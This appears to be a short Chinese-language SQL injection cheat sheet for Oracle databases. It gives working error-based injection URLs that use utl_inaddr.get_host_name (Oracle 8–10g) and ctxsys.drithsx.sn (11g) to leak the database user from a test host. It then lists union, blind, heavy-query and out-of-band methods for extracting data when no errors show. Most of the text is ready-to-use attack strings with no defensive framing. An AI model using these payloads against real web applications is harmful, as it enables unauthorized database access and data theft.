---恢复内容开始---
一、报错注入
(1)爆用户名(适用于:Oracle8,9和10g):
http://192.168.2.10/ora2.php?name=1' and 1=utl_inaddr.get_host_name((select user from dual))--
(2)基于报错注入(适用于Oracle 11g)取信息:
ctxsys.drithsx.sn(1,(SQL语句))
例如:
http://192.168.2.10/ora1.php?name=' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--
二、无报错信息
可通过以下几种方式来实现提取数据:
(1)联合查询;
(2)盲注;
(3)Heavy Queries
(4)Out Of Band Channels(带外通道)
---恢复内容结束---